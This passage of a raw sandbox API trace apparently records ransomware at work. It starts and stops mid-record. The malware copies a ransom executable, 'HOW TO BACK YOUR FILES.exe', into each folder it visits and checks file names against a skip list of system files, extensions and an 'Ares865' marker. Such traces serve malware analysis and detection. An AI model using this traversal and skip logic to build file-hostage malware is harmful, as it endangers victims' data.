User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.573] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.573] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.573] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.573] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.573] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.573] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.573] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.573] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.573] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.573] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.573] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.573] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.574] lstrlenW (lpString="desktop.ini") returned 11 [0041.574] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*") returned 84 [0041.574] lstrcpyW (in: lpString1=0x2e2e906, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.574] lstrlenW (lpString="desktop.ini") returned 11 [0041.574] lstrlenW (lpString="Ares865") returned 7 [0041.574] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.574] lstrlenW (lpString=".dll") returned 4 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.574] lstrlenW (lpString=".lnk") returned 4 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.574] lstrlenW (lpString=".ini") returned 4 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.574] lstrlenW (lpString=".sys") returned 4 [0041.574] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.574] lstrlenW (lpString="desktop.ini") returned 11 [0041.574] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.574] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.574] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.574] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.574] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0041.574] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0041.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb438 | out: hHeap=0x2b0000) returned 1 [0041.575] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0041.575] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned 82 [0041.575] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0041.575] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.575] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.579] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.579] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.580] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.580] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.580] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.580] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.580] lstrlenW (lpString="desktop.ini") returned 11 [0041.580] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*") returned 84 [0041.580] lstrcpyW (in: lpString1=0x2e2e906, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.580] lstrlenW (lpString="desktop.ini") returned 11 [0041.580] lstrlenW (lpString="Ares865") returned 7 [0041.580] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.580] lstrlenW (lpString=".dll") returned 4 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.580] lstrlenW (lpString=".lnk") returned 4 [0041.580] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.580] lstrlenW (lpString=".ini") returned 4 [0041.581] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.581] lstrlenW (lpString=".sys") returned 4 [0041.581] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.581] lstrlenW (lpString="desktop.ini") returned 11 [0041.581] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.581] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.581] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.581] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.581] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0041.581] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0041.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0041.581] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0041.581] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned 82 [0041.581] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0041.581] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.581] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.587] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.587] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.587] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.587] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.587] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.587] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a613160, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.587] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.587] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.587] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.587] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.587] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.587] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.588] lstrlenW (lpString="desktop.ini") returned 11 [0041.588] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*") returned 84 [0041.588] lstrcpyW (in: lpString1=0x2e2e906, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.588] lstrlenW (lpString="desktop.ini") returned 11 [0041.588] lstrlenW (lpString="Ares865") returned 7 [0041.588] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.588] lstrlenW (lpString=".dll") returned 4 [0041.588] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.588] lstrlenW (lpString=".lnk") returned 4 [0041.588] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.588] lstrlenW (lpString=".ini") returned 4 [0041.588] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.588] lstrlenW (lpString=".sys") returned 4 [0041.588] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.588] lstrlenW (lpString="desktop.ini") returned 11 [0041.588] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.588] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.588] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a613160, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a613160, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.588] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.588] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2388 [0041.588] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Microsoft" [0041.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0041.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0041.588] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft") returned 46 [0041.588] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft") returned="C:\\Users\\Default User\\Local Settings\\Microsoft" [0041.588] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.588] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.593] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.593] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.593] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.593] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.593] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.593] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a6392c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a6392c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.593] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.593] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.593] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.593] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.593] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="aoldtz.exe") returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2=".") returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="..") returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="windows") returned -1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="bootmgr") returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="temp") returned -1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="pagefile.sys") returned -1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="boot") returned 1 [0041.593] lstrcmpiW (lpString1="Credentials", lpString2="ids.txt") returned -1 [0041.594] lstrcmpiW (lpString1="Credentials", lpString2="ntuser.dat") returned -1 [0041.594] lstrcmpiW (lpString1="Credentials", lpString2="perflogs") returned -1 [0041.594] lstrcmpiW (lpString1="Credentials", lpString2="MSBuild") returned -1 [0041.594] lstrlenW (lpString="Credentials") returned 11 [0041.594] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\*") returned 48 [0041.594] lstrcpyW (in: lpString1=0x2e2e8be, lpString2="Credentials" | out: lpString1="Credentials") returned="Credentials" [0041.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0041.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1608 [0041.594] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2388 | out: ListHead=0x2e77d0, ListEntry=0x2d2388) returned 0x2d2368 [0041.594] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 